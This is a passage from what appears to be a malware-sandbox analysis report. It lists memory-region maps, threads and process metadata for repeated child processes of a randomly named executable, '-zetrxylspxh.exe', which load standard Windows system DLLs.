"c:\\windows\\syswow64\\ntdll.dll") Region: id = 4020 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4021 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4022 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4023 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4024 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4232 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4233 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4234 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4235 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4236 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4237 start_va = 0x510000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 4254 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4255 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4645 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4646 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4647 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4648 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4649 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4650 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4651 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4652 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4653 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4654 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4655 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4656 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4657 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4658 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4659 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4660 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4661 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4662 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4663 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4664 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4665 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4666 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4667 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4668 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5163 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5164 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5165 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5166 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 5167 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 117 os_tid = 0x5ec Thread: id = 145 os_tid = 0x9f4 Thread: id = 181 os_tid = 0x5ec Process: id = "29" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd3d6000" os_pid = "0x80c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4035 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4036 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4037 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4038 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4039 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4040 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4041 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4042 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4043 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4044 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4045 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4046 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4047 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4048 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4049 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4050 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4304 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4305 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4306 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4307 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4308 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4309 start_va = 0x440000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4326 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4327 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4717 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4718 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4719 start_va = 0x5e0000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4720 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4721 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4722 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4723 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4724 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 4725 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4726 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4727 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4728 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4729 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4730 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4731 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4732 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4733 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4734 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4735 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4736 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5234 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5235 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5236 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5237 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5238 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5239 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5240 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5241 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5242 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 5243 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 118 os_tid = 0x738 Thread: id = 147 os_tid = 0x920 Thread: id = 185 os_tid = 0x738 Process: id = "30" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xf9db000" os_pid = "0x13a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4056 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4057 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4058 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4059 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4060 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4061 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4062 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4063 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4064 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4065 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4066 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4067 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4068 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4069 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4070 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4071 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4382 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4383 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4384 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4385 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4386 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4387 start_va = 0x440000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4388 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4389 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4406 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4407 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4408 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4766 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4767 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4768 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4769 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: 